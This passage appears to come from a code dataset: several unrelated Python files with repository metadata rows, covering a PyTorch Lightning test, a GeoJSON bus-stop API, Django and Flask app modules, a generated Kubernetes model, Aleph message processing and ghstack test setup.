2, False, 0, id='mix_of_tensor_dims'
),
pytest.param(
3, False, 0, id='string_list_predictions'
),
pytest.param(
4, False, 0, id='int_list_predictions'
),
pytest.param(
5, False, 0, id='nested_list_predictions'
),
pytest.param(
6, False, 0, id='dict_list_predictions'
),
pytest.param(
0, True, 1, id='full_loop_single_gpu', marks=pytest.mark.skipif(torch.cuda.device_count() < 1, reason="test requires single-GPU machine")
)
]
)
def test_result_obj_predictions(tmpdir, test_option, do_train, gpus):
tutils.reset_seed()
dm = TrialMNISTDataModule(tmpdir)
prediction_file = Path('predictions.pt')
model = EvalModelTemplate()
model.test_option = test_option
model.prediction_file = prediction_file.as_posix()
model.test_step = model.test_step_result_preds
model.test_step_end = None
model.test_epoch_end = None
model.test_end = None
if prediction_file.exists():
prediction_file.unlink()
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=3,
weights_summary=None,
deterministic=True,
gpus=gpus
)
# Prediction file shouldn't exist yet because we haven't done anything
assert not prediction_file.exists()
if do_train:
result = trainer.fit(model, dm)
assert result == 1
result = trainer.test(datamodule=dm)
result = result[0]
assert result['test_loss'] < 0.6
assert result['test_acc'] > 0.8
else:
result = trainer.test(model, datamodule=dm)
# check prediction file now exists and is of expected length
assert prediction_file.exists()
predictions = torch.load(prediction_file)
assert len(predictions) == len(dm.mnist_test)
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
def test_result_obj_predictions_ddp_spawn(tmpdir):
distributed_backend = 'ddp_spawn'
option = 0
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '0,1'
seed_everything(4321)
dm = TrialMNISTDataModule(tmpdir)
prediction_file = Path('predictions.pt')
model = EvalModelTemplate()
model.test_option = option
model.prediction_file = prediction_file.as_posix()
model.test_step = model.test_step_result_preds
model.test_step_end = None
model.test_epoch_end = None
model.test_end = None
prediction_files = [Path('predictions_rank_0.pt'), Path('predictions_rank_1.pt')]
for prediction_file in prediction_files:
if prediction_file.exists():
prediction_file.unlink()
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=3,
weights_summary=None,
deterministic=True,
distributed_backend=distributed_backend,
gpus=[0, 1]
)
# Prediction file shouldn't exist yet because we haven't done anything
# assert not model.prediction_file.exists()
result = trainer.fit(model, dm)
assert result == 1
result = trainer.test(datamodule=dm)
result = result[0]
assert result['test_loss'] < 0.6
assert result['test_acc'] > 0.8
dm.setup('test')
# check prediction file now exists and is of expected length
size = 0
for prediction_file in prediction_files:
assert prediction_file.exists()
predictions = torch.load(prediction_file)
size += len(predictions)
assert size == len(dm.mnist_test)
| 30.016949 | 149 | 0.675325 |
919f7c3181b654b66f6876d0e9177ea641dfb488
| 3,554 |
py
|
Python
|
api/stops.py
|
TiltShiftNL/tourbuzz-geo-api
|
133cd723e1885d763247b42876b58c58735be820
|
[
"MIT"
] | null | null | null |
api/stops.py
|
TiltShiftNL/tourbuzz-geo-api
|
133cd723e1885d763247b42876b58c58735be820
|
[
"MIT"
] | 1 |
2020-07-28T09:14:01.000Z
|
2020-07-28T10:14:55.000Z
|
api/stops.py
|
TiltShiftNL/tourbuzz-geo-api
|
133cd723e1885d763247b42876b58c58735be820
|
[
"MIT"
] | null | null | null |
import json
from .models import DbStop
from .database import SessionLocal, engine
from .settings import settings
from geoalchemy2 import func
def get_base_query():
db = SessionLocal()
return db.query(
DbStop.id,
DbStop.source_url,
DbStop.source_name,
DbStop.source_id,
DbStop.link_url,
DbStop.link_title,
DbStop.name,
DbStop.title,
DbStop.description,
DbStop.spots_text,
DbStop.spots,
DbStop.point.ST_Transform(4326).ST_AsGeoJson())
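# Note: callers below index the returned rows positionally, following the column order above:
# 0=id, 1=source_url, 2=source_name, 3=source_id, 4=link_url, 5=link_title, 6=name, 7=title,
# 8=description, 9=spots_text, 10=spots, 11=point serialized as GeoJSON.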
def construct_geojson(result):
feature_collection = {
"type": "FeatureCollection",
"name": "stops",
"crs": {
"type": "name",
"properties": {
"name": "urn:ogc:def:crs:OGC:1.3:CRS84"
}
},
"features": []
}
for entry in result:
out = {
"type": "Feature",
"id": entry[0],
"properties": {
"title": entry[7],
"name": entry[6],
"description": entry[8],
"spots_text": entry[9],
"spots": entry[10],
"source": {
"name": entry[2],
"url": entry[1],
"id": entry[3]
}
},
"geometry": json.loads(entry[11])
}
feature_collection["features"].append(out)
return feature_collection
def legacy():
result_set = {
"haltes": {}
}
try:
result = get_base_query().all()
    except Exception:  # table may not exist yet on first run; create it and retry
DbStop.__table__.create(engine)
result = get_base_query().all()
for entry in result:
point = json.loads(entry[11])
out = {
"haltenummer": entry[3],
"straat": entry[6],
"locatie": entry[8],
"capaciteit": entry[10],
"location": {
"lat": point["coordinates"][1],
"lng": point["coordinates"][0]
},
"mapsImageUrl": "https://maps.googleapis.com/maps/api/staticmap?center=" + \
str(point["coordinates"][1]) + "," + str(point["coordinates"][0]) + \
"&zoom=16&size=600x300&maptype=roadmap&markers=" + \
str(point["coordinates"][1]) + "," + str(point["coordinates"][0]) + \
"&key=" + settings.GOOGLE_MAPS_KEY,
"mapsUrl": "https://www.google.com/maps/?q=loc:" + \
str(point["coordinates"][1]) + "," + str(point["coordinates"][0]),
"beschikbaar": True,
"_origineel": {
"title": entry[7],
"Lokatie": entry[11],
"Bijzonderheden": entry[8],
"Busplaatsen": entry[9]
}
}
result_set["haltes"][entry[3]] = out
return result_set
def geojson_bbox(bounds):
bounds_parts = bounds.split(',')
result = get_base_query().filter(
func.ST_Intersects(
func.ST_MakeEnvelope(
bounds_parts[0],
bounds_parts[1],
bounds_parts[2],
bounds_parts[3],
4326
),
DbStop.point.ST_Transform(4326),
)
).all()
return construct_geojson(result)
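# Usage sketch (hypothetical WGS84 coordinates): geojson_bbox("4.85,52.33,4.95,52.42"),
# i.e. the bounds string is "min_lng,min_lat,max_lng,max_lat" as fed to ST_MakeEnvelope above.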
def geojson_all():
try:
result = get_base_query().all()
    except Exception:  # table may not exist yet on first run; create it and retry
DbStop.__table__.create(engine)
result = get_base_query().all()
return construct_geojson(result)
| 28.206349 | 88 | 0.481711 |
c14a644baea3af34d73c8492fc38398c340e8c86
| 166 |
py
|
Python
|
info/urls.py
|
ycy-tw/python-django-stock
|
263a926ae6aa8248fd4c4e8d767c5dc9d522e4c0
|
[
"MIT"
] | 2 |
2021-04-25T07:01:01.000Z
|
2021-05-07T10:17:26.000Z
|
info/urls.py
|
ycy-tw/python-django-stock
|
263a926ae6aa8248fd4c4e8d767c5dc9d522e4c0
|
[
"MIT"
] | null | null | null |
info/urls.py
|
ycy-tw/python-django-stock
|
263a926ae6aa8248fd4c4e8d767c5dc9d522e4c0
|
[
"MIT"
] | null | null | null |
from django.urls import path, include
from .views import (
basic_variable_view,
)
urlpatterns = [
path('<int:symbol>/', basic_variable_view, name='info'),
]
| 18.444444 | 60 | 0.698795 |
72cc7e4d231809b3f0c8ae9421cd941f2c6054d5
| 15,979 |
py
|
Python
|
src/aleph/chains/common.py
|
aleph-im/py-aleph
|
a18beb8b4eba36887ca85054ed2471c3680bdfde
|
[
"MIT"
] | null | null | null |
src/aleph/chains/common.py
|
aleph-im/py-aleph
|
a18beb8b4eba36887ca85054ed2471c3680bdfde
|
[
"MIT"
] | null | null | null |
src/aleph/chains/common.py
|
aleph-im/py-aleph
|
a18beb8b4eba36887ca85054ed2471c3680bdfde
|
[
"MIT"
] | null | null | null |
import asyncio
import json
import logging
from dataclasses import asdict
from enum import IntEnum
from typing import Dict, Optional, Tuple, List
from aleph_message.models import MessageType, ItemType
from bson import ObjectId
from pymongo import UpdateOne
from aleph.config import get_config
from aleph.exceptions import (
AlephStorageException,
InvalidContent,
ContentCurrentlyUnavailable,
UnknownHashError,
InvalidMessageError,
)
from aleph.handlers.forget import handle_forget_message
from aleph.handlers.storage import handle_new_storage
from aleph.model.db_bulk_operation import DbBulkOperation
from aleph.model.filepin import PermanentPin
from aleph.model.messages import CappedMessage, Message
from aleph.model.pending import PendingMessage, PendingTX
from aleph.network import check_message as check_message_fn
from aleph.permissions import check_sender_authorization
from aleph.storage import get_json, pin_hash, add_json, get_message_content
from .tx_context import TxContext
from ..schemas.pending_messages import BasePendingMessage
from ..utils import item_type_from_hash
LOGGER = logging.getLogger("chains.common")
async def get_verification_buffer(message: BasePendingMessage) -> bytes:
"""Returns a serialized string to verify the message integrity
(this is was it signed)
"""
buffer = f"{message.chain}\n{message.sender}\n{message.type}\n{message.item_hash}"
return buffer.encode("utf-8")
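# Example (hypothetical values): a message with chain="ETH", sender="0xabc", type="POST"
# and item_hash="Qm..." yields the buffer b"ETH\n0xabc\nPOST\nQm...".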
async def mark_confirmed_data(chain_name, tx_hash, height):
"""Returns data required to mark a particular hash as confirmed
in underlying chain.
"""
return {
"confirmed": True,
"confirmations": [ # TODO: we should add the current one there
# and not replace it.
{"chain": chain_name, "height": height, "hash": tx_hash}
],
}
async def delayed_incoming(message, chain_name=None, tx_hash=None, height=None):
if message is None:
return
await PendingMessage.collection.insert_one(
{
"message": message,
"source": dict(
chain_name=chain_name,
tx_hash=tx_hash,
height=height,
check_message=True, # should we store this?
),
}
)
class IncomingStatus(IntEnum):
FAILED_PERMANENTLY = -1
RETRYING_LATER = 0
MESSAGE_HANDLED = 1
async def mark_message_for_retry(
message: Dict,
chain_name: Optional[str],
tx_hash: Optional[str],
height: Optional[int],
check_message: bool,
retrying: bool,
existing_id,
):
if not retrying:
await PendingMessage.collection.insert_one(
{
"message": message,
"source": dict(
chain_name=chain_name,
tx_hash=tx_hash,
height=height,
check_message=check_message, # should we store this?
),
}
)
else:
LOGGER.debug(f"Incrementing for {existing_id}")
result = await PendingMessage.collection.update_one(
filter={"_id": ObjectId(existing_id)}, update={"$inc": {"retries": 1}}
)
LOGGER.debug(f"Update result {result}")
def update_message_item_type(message_dict: Dict) -> Dict:
"""
Ensures that the item_type field of a message is present.
Sets it to the default value if the field is not specified.
"""
if "item_type" in message_dict:
return message_dict
if "item_content" in message_dict:
item_type = ItemType.inline
else:
item_type = item_type_from_hash(message_dict["item_hash"])
message_dict["item_type"] = item_type
return message_dict
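# Example: a message that carries "item_content" gets item_type "inline"; otherwise the type
# is inferred from the hash via item_type_from_hash (hypothetically, a CID would map to ipfs
# and a plain sha256 hex digest to storage).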
async def incoming(
message: Dict,
chain_name: Optional[str] = None,
tx_hash: Optional[str] = None,
height: Optional[int] = None,
seen_ids: Optional[Dict[Tuple, int]] = None,
check_message: bool = False,
retrying: bool = False,
existing_id: Optional[ObjectId] = None,
) -> Tuple[IncomingStatus, List[DbBulkOperation]]:
"""New incoming message from underlying chain.
    For regular messages it will be marked as confirmed
    if it already exists in the database, and created if not.
"""
# TODO: this is a temporary fix to set the item_type of the message to the correct
# value. This should be replaced by a full use of Pydantic models.
message = update_message_item_type(message)
item_hash = message["item_hash"]
sender = message["sender"]
ids_key = (item_hash, sender, chain_name)
if chain_name and tx_hash and height and seen_ids is not None:
if ids_key in seen_ids.keys():
if height > seen_ids[ids_key]:
return IncomingStatus.MESSAGE_HANDLED, []
filters = {
"item_hash": item_hash,
"chain": message["chain"],
"sender": message["sender"],
"type": message["type"],
}
existing = await Message.collection.find_one(
filters,
projection={"confirmed": 1, "confirmations": 1, "time": 1, "signature": 1},
)
if check_message:
if existing is None or (existing["signature"] != message["signature"]):
# check/sanitize the message if needed
try:
message = await check_message_fn(
message, from_chain=(chain_name is not None)
)
except InvalidMessageError:
return IncomingStatus.FAILED_PERMANENTLY, []
if message is None:
return IncomingStatus.MESSAGE_HANDLED, []
if retrying:
LOGGER.debug("(Re)trying %s." % item_hash)
else:
LOGGER.info("Incoming %s." % item_hash)
# we set the incoming chain as default for signature
message["chain"] = message.get("chain", chain_name)
# if existing is None:
    # # TODO: verify if search key is ok. do we need a unique key for messages?
# existing = await Message.collection.find_one(
# filters, projection={'confirmed': 1, 'confirmations': 1, 'time': 1})
if chain_name and tx_hash and height:
# We are getting a confirmation here
new_values = await mark_confirmed_data(chain_name, tx_hash, height)
updates = {
"$set": {
"confirmed": True,
},
"$min": {"time": message["time"]},
"$addToSet": {"confirmations": new_values["confirmations"][0]},
}
else:
updates = {
"$max": {
"confirmed": False,
},
"$min": {"time": message["time"]},
}
# new_values = {'confirmed': False} # this should be our default.
should_commit = False
if existing:
if seen_ids is not None and height is not None:
if ids_key in seen_ids.keys():
if height > seen_ids[ids_key]:
return IncomingStatus.MESSAGE_HANDLED, []
else:
seen_ids[ids_key] = height
else:
seen_ids[ids_key] = height
# THIS CODE SHOULD BE HERE...
# But, if a race condition appeared, we might have the message twice.
# if (existing['confirmed'] and
# chain_name in [c['chain'] for c in existing['confirmations']]):
# return
LOGGER.debug("Updating %s." % item_hash)
if chain_name and tx_hash and height:
# we need to update messages adding the confirmation
# await Message.collection.update_many(filters, updates)
should_commit = True
else:
# if not (chain_name and tx_hash and height):
# new_values = {'confirmed': False} # this should be our default.
try:
content = await get_message_content(message)
except InvalidContent:
LOGGER.warning("Can't get content of object %r, won't retry." % item_hash)
return IncomingStatus.FAILED_PERMANENTLY, []
except (ContentCurrentlyUnavailable, Exception) as e:
if not isinstance(e, ContentCurrentlyUnavailable):
LOGGER.exception("Can't get content of object %r" % item_hash)
await mark_message_for_retry(
message=message,
chain_name=chain_name,
tx_hash=tx_hash,
height=height,
check_message=check_message,
retrying=retrying,
existing_id=existing_id,
)
return IncomingStatus.RETRYING_LATER, []
json_content = content.value
if json_content.get("address", None) is None:
json_content["address"] = message["sender"]
if json_content.get("time", None) is None:
json_content["time"] = message["time"]
# warning: those handlers can modify message and content in place
# and return a status. None has to be retried, -1 is discarded, True is
# handled and kept.
# TODO: change this, it's messy.
try:
if message["type"] == MessageType.store:
handling_result = await handle_new_storage(message, json_content)
elif message["type"] == MessageType.forget:
# Handling it here means that there we ensure that the message
# has been forgotten before it is saved on the node.
# We may want the opposite instead: ensure that the message has
# been saved before it is forgotten.
handling_result = await handle_forget_message(message, json_content)
else:
handling_result = True
except UnknownHashError:
LOGGER.warning(f"Invalid IPFS hash for message {item_hash}, won't retry.")
return IncomingStatus.FAILED_PERMANENTLY, []
except Exception:
LOGGER.exception("Error using the message type handler")
handling_result = None
if handling_result is None:
LOGGER.debug("Message type handler has failed, retrying later.")
await mark_message_for_retry(
message=message,
chain_name=chain_name,
tx_hash=tx_hash,
height=height,
check_message=check_message,
retrying=retrying,
existing_id=existing_id,
)
return IncomingStatus.RETRYING_LATER, []
if not handling_result:
LOGGER.warning(
"Message type handler has failed permanently for "
"%r, won't retry." % item_hash
)
return IncomingStatus.FAILED_PERMANENTLY, []
if not await check_sender_authorization(message, json_content):
LOGGER.warning("Invalid sender for %s" % item_hash)
return IncomingStatus.MESSAGE_HANDLED, []
if seen_ids is not None and height is not None:
if ids_key in seen_ids.keys():
if height > seen_ids[ids_key]:
return IncomingStatus.MESSAGE_HANDLED, []
else:
seen_ids[ids_key] = height
else:
seen_ids[ids_key] = height
LOGGER.debug("New message to store for %s." % item_hash)
# message.update(new_values)
updates["$set"] = {
"content": json_content,
"size": len(content.raw_value),
"item_content": message.get("item_content"),
"item_type": message.get("item_type"),
"channel": message.get("channel"),
"signature": message.get("signature"),
**updates.get("$set", {}),
}
should_commit = True
if should_commit:
update_op = UpdateOne(filters, updates, upsert=True)
bulk_ops = [DbBulkOperation(Message, update_op)]
# Capped collections do not accept updates that increase the size, so
# we must ignore confirmations.
if existing is None:
bulk_ops.append(DbBulkOperation(CappedMessage, update_op))
return IncomingStatus.MESSAGE_HANDLED, bulk_ops
return IncomingStatus.MESSAGE_HANDLED, []
async def process_one_message(message: Dict, *args, **kwargs):
"""
Helper function to process a message on the spot.
"""
status, ops = await incoming(message, *args, **kwargs)
for op in ops:
await op.collection.collection.bulk_write([op.operation])
async def get_chaindata(messages, bulk_threshold=2000):
"""Returns content ready to be broadcasted on-chain (aka chaindata).
If message length is over bulk_threshold (default 2000 chars), store list
in IPFS and store the object hash instead of raw list.
"""
chaindata = {"protocol": "aleph", "version": 1, "content": {"messages": messages}}
content = json.dumps(chaindata)
if len(content) > bulk_threshold:
ipfs_id = await add_json(chaindata)
return json.dumps(
{"protocol": "aleph-offchain", "version": 1, "content": ipfs_id}
)
else:
return content
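# Sketch of the two shapes produced above (hypothetical hashes): a small batch stays inline as
# {"protocol": "aleph", "version": 1, "content": {"messages": [...]}}, while a payload longer
# than bulk_threshold is stored via add_json() and referenced as
# {"protocol": "aleph-offchain", "version": 1, "content": "<ipfs hash>"}.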
async def get_chaindata_messages(
chaindata: Dict, context: TxContext, seen_ids: Optional[List] = None
):
config = get_config()
protocol = chaindata.get("protocol", None)
version = chaindata.get("version", None)
if protocol == "aleph" and version == 1:
messages = chaindata["content"]["messages"]
if not isinstance(messages, list):
error_msg = f"Got bad data in tx {context!r}"
raise InvalidContent(error_msg)
return messages
if protocol == "aleph-offchain" and version == 1:
assert isinstance(chaindata.get("content"), str)
if seen_ids is not None:
if chaindata["content"] in seen_ids:
# is it really what we want here?
LOGGER.debug("Already seen")
return None
else:
LOGGER.debug("Adding to seen_ids")
seen_ids.append(chaindata["content"])
try:
content = await get_json(chaindata["content"], timeout=10)
except AlephStorageException:
# Let the caller handle unavailable/invalid content
raise
except Exception as e:
error_msg = f"Can't get content of offchain object {chaindata['content']!r}"
LOGGER.exception("%s", error_msg)
raise ContentCurrentlyUnavailable(error_msg) from e
try:
messages = await get_chaindata_messages(content.value, context)
except AlephStorageException:
LOGGER.debug("Got no message")
raise
LOGGER.info("Got bulk data with %d items" % len(messages))
if config.ipfs.enabled.value:
try:
LOGGER.info(f"chaindata {chaindata}")
await PermanentPin.register(
multihash=chaindata["content"],
reason={
"source": "chaindata",
"protocol": chaindata["protocol"],
"version": chaindata["version"],
},
)
# Some IPFS fetches can take a while, hence the large timeout.
await asyncio.wait_for(pin_hash(chaindata["content"]), timeout=120)
except asyncio.TimeoutError:
LOGGER.warning(f"Can't pin hash {chaindata['content']}")
return messages
else:
error_msg = f"Got unknown protocol/version object in tx {context!r}"
LOGGER.info("%s", error_msg)
raise InvalidContent(error_msg)
async def incoming_chaindata(content: Dict, context: TxContext):
"""Incoming data from a chain.
    Content can be inline or "offchain" through an IPFS hash.
    For now we only add it to the database; it will be processed later.
"""
await PendingTX.collection.insert_one(
{"content": content, "context": asdict(context)}
)
| 35.827354 | 88 | 0.610489 |
ae031947aa305d704ac5713b165fe51ba01c3a70
| 1,870 |
py
|
Python
|
app/models.py
|
andyhoang7/flaskFBlogin
|
773b85842eb0e4ab6c0671402058a3cc808b3063
|
[
"MIT"
] | null | null | null |
app/models.py
|
andyhoang7/flaskFBlogin
|
773b85842eb0e4ab6c0671402058a3cc808b3063
|
[
"MIT"
] | null | null | null |
app/models.py
|
andyhoang7/flaskFBlogin
|
773b85842eb0e4ab6c0671402058a3cc808b3063
|
[
"MIT"
] | null | null | null |
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager, UserMixin
from flask_dance.consumer.storage.sqla import OAuthConsumerMixin
db = SQLAlchemy()
class User(UserMixin, db.Model):
__tablename__="users"
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(256), unique=True)
class OAuth(OAuthConsumerMixin, db.Model):
provider_user_id = db.Column(db.String(256), unique=True, nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False)
user = db.relationship(User)
class Token(db.Model):
id = db.Column(db.Integer, primary_key=True)
uuid = db.Column(db.String, unique=True)
user_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False)
user = db.relationship(User)
class Scores(db.Model):
id = db.Column(db.Integer, primary_key=True)
wpm = db.Column(db.String)
time = db.Column(db.String)
error = db.Column(db.String)
user_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False)
user = db.relationship(User)
excerp_id = db.Column(db.Integer, db.ForeignKey('excerpts.id'), nullable=False)
excerp = db.relationship('Excerpts')
class Excerpts(db.Model):
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.String)
# setup login manager
login_manager = LoginManager()
# login_manager.login_view = "facebook.login"
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
@login_manager.request_loader
def load_user_from_request(request):
# Login Using our Custom Header
api_key = request.headers.get('Authorization')
if api_key:
api_key = api_key.replace('Token ', '', 1)
token = Token.query.filter_by(uuid=api_key).first()
if token:
return token.user
return None
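# Example header accepted by the request loader above (hypothetical UUID):
#   Authorization: Token 123e4567-e89b-12d3-a456-426614174000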
| 28.333333 | 83 | 0.703743 |
920441c303dc0b3ebd8084397e67015bde2180cb
| 6,286 |
py
|
Python
|
kubernetes/client/models/v1beta1_role_list.py
|
anemerovsky-essextec/python
|
6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c
|
[
"Apache-2.0"
] | null | null | null |
kubernetes/client/models/v1beta1_role_list.py
|
anemerovsky-essextec/python
|
6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c
|
[
"Apache-2.0"
] | null | null | null |
kubernetes/client/models/v1beta1_role_list.py
|
anemerovsky-essextec/python
|
6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.12.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1RoleList(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'api_version': 'str',
'items': 'list[V1beta1Role]',
'kind': 'str',
'metadata': 'V1ListMeta'
}
attribute_map = {
'api_version': 'apiVersion',
'items': 'items',
'kind': 'kind',
'metadata': 'metadata'
}
def __init__(self, api_version=None, items=None, kind=None, metadata=None):
"""
V1beta1RoleList - a model defined in Swagger
"""
self._api_version = None
self._items = None
self._kind = None
self._metadata = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
self.items = items
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
@property
def api_version(self):
"""
Gets the api_version of this V1beta1RoleList.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:return: The api_version of this V1beta1RoleList.
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""
Sets the api_version of this V1beta1RoleList.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:param api_version: The api_version of this V1beta1RoleList.
:type: str
"""
self._api_version = api_version
@property
def items(self):
"""
Gets the items of this V1beta1RoleList.
Items is a list of Roles
:return: The items of this V1beta1RoleList.
:rtype: list[V1beta1Role]
"""
return self._items
@items.setter
def items(self, items):
"""
Sets the items of this V1beta1RoleList.
Items is a list of Roles
:param items: The items of this V1beta1RoleList.
:type: list[V1beta1Role]
"""
if items is None:
raise ValueError("Invalid value for `items`, must not be `None`")
self._items = items
@property
def kind(self):
"""
Gets the kind of this V1beta1RoleList.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:return: The kind of this V1beta1RoleList.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this V1beta1RoleList.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param kind: The kind of this V1beta1RoleList.
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""
Gets the metadata of this V1beta1RoleList.
Standard object's metadata.
:return: The metadata of this V1beta1RoleList.
:rtype: V1ListMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""
Sets the metadata of this V1beta1RoleList.
Standard object's metadata.
:param metadata: The metadata of this V1beta1RoleList.
:type: V1ListMeta
"""
self._metadata = metadata
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta1RoleList):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 29.650943 | 281 | 0.596246 |
75b5a85adfc584b7fe8b7f8b95d1161720cefce9
| 1,047 |
py
|
Python
|
Testing/urls.py
|
DudaEugen/JustTesting
|
7b62c7f5d1d918c3fe82bf00aff4009212427a6f
|
[
"MIT"
] | null | null | null |
Testing/urls.py
|
DudaEugen/JustTesting
|
7b62c7f5d1d918c3fe82bf00aff4009212427a6f
|
[
"MIT"
] | null | null | null |
Testing/urls.py
|
DudaEugen/JustTesting
|
7b62c7f5d1d918c3fe82bf00aff4009212427a6f
|
[
"MIT"
] | null | null | null |
from django.conf.urls import url
from .views import *
urlpatterns = [
url(r'^start(?:=(?P<test_pk>\d+))?$', TestingSessionCreateView.as_view(), name='create testing session'),
url(r'^session=(?P<pk>\d+)$', TestingView.as_view(), name='testing'),
url(r'^session=(?P<pk>\d+)/close$', CloseTestingSessionView.as_view(), name='close testing session'),
url(r'^session=(?P<session_pk>\d+)/solution=(?P<solution_pk>\d+)/correct$', RightSolutionView.as_view(),
name='right solution'),
url(r'^session=(?P<session_pk>\d+)/skip_task$', SkipTaskView.as_view(), name='skip task'),
url(r'^session=(?P<pk>\d+)/result$', TestingResultView.as_view(), name='testing result'),
url(r'^sessions$', ActiveTestingSessions.as_view(), name='active testing sessions'),
url(r'^results$', ResultsDispatcherView.as_view(), name='results dispatcher'),
url(r'^results/test=(?P<test_pk>\d+)&dates=(?P<from>[0-9]{2}.[0-9]{2}.[0-9]{4})-'
r'(?P<to>[0-9]{2}.[0-9]{2}.[0-9]{4})$', ResultsView.as_view(), name='testing results')
]
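# Example paths matched by the patterns above (hypothetical ids and dates):
#   start=3, session=7, session=7/solution=12/correct, session=7/result,
#   results/test=3&dates=01.01.2021-31.12.2021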
| 58.166667 | 109 | 0.646609 |
ac2c781e3e7704031454966ab93612199d134b7d
| 194 |
py
|
Python
|
empyror/config.py
|
GoogleGenius/empyror
|
c0a2db376e1e21eaa42ffda52b38ff5308e70c59
|
[
"Apache-2.0"
] | null | null | null |
empyror/config.py
|
GoogleGenius/empyror
|
c0a2db376e1e21eaa42ffda52b38ff5308e70c59
|
[
"Apache-2.0"
] | null | null | null |
empyror/config.py
|
GoogleGenius/empyror
|
c0a2db376e1e21eaa42ffda52b38ff5308e70c59
|
[
"Apache-2.0"
] | null | null | null |
import os
from dotenv import load_dotenv # type: ignore
import hikari
load_dotenv()
TOKEN: str = os.environ["TOKEN"]
GUILD_ID: hikari.Snowflake = hikari.Snowflake(os.environ["GUILD_ID"])
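# Minimal .env consumed by load_dotenv() above (hypothetical values):
#   TOKEN=your-bot-token
#   GUILD_ID=123456789012345678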
| 14.923077 | 69 | 0.747423 |
61622c0fa73510da21a8f448d471b45a079a17b1
| 46,877 |
py
|
Python
|
test_ghstack.py
|
pietern/ghstack
|
c524683caaa525a084a9f980868ce003213ed5e9
|
[
"MIT"
] | 1 |
2020-06-07T02:30:21.000Z
|
2020-06-07T02:30:21.000Z
|
test_ghstack.py
|
pietern/ghstack
|
c524683caaa525a084a9f980868ce003213ed5e9
|
[
"MIT"
] | null | null | null |
test_ghstack.py
|
pietern/ghstack
|
c524683caaa525a084a9f980868ce003213ed5e9
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import unittest
import subprocess
import os
import shutil
import tempfile
import re
import logging
import sys
import contextlib
import io
from typing import ClassVar, Dict, NewType, List, Tuple, Iterator
import ghstack.expecttest as expecttest
import ghstack.submit
import ghstack.land
import ghstack.shell
import ghstack.github
import ghstack.unlink
import ghstack.github_fake
from ghstack.submit import GitCommitHash
@contextlib.contextmanager
def captured_output() -> Iterator[Tuple[io.StringIO, io.StringIO]]:
new_out, new_err = io.StringIO(), io.StringIO()
old_out, old_err = sys.stdout, sys.stderr
try:
sys.stdout, sys.stderr = new_out, new_err
yield sys.stdout, sys.stderr
finally:
sys.stdout, sys.stderr = old_out, old_err
# TODO: Figure out how to make all git stuff in memory, so it runs
# faster. Need to work on OSX.
GH_KEEP_TMP = os.getenv('GH_KEEP_TMP')
SubstituteRev = NewType('SubstituteRev', str)
def strip_trailing_whitespace(text: str) -> str:
return re.sub(r' +$', '', text, flags=re.MULTILINE)
def indent(text: str, prefix: str) -> str:
return ''.join(prefix + line if line.strip() else line
for line in text.splitlines(True))
class TestGh(expecttest.TestCase):
proc: ClassVar[subprocess.Popen]
github: ghstack.github.GitHubEndpoint
rev_map: Dict[SubstituteRev, GitCommitHash]
upstream_sh: ghstack.shell.Shell
sh: ghstack.shell.Shell
def setUp(self) -> None:
# Set up a "parent" repository with an empty initial commit that we'll operate on
upstream_dir = tempfile.mkdtemp()
if GH_KEEP_TMP:
self.addCleanup(lambda: print("upstream_dir preserved at: {}".format(upstream_dir)))
else:
self.addCleanup(lambda: shutil.rmtree(upstream_dir))
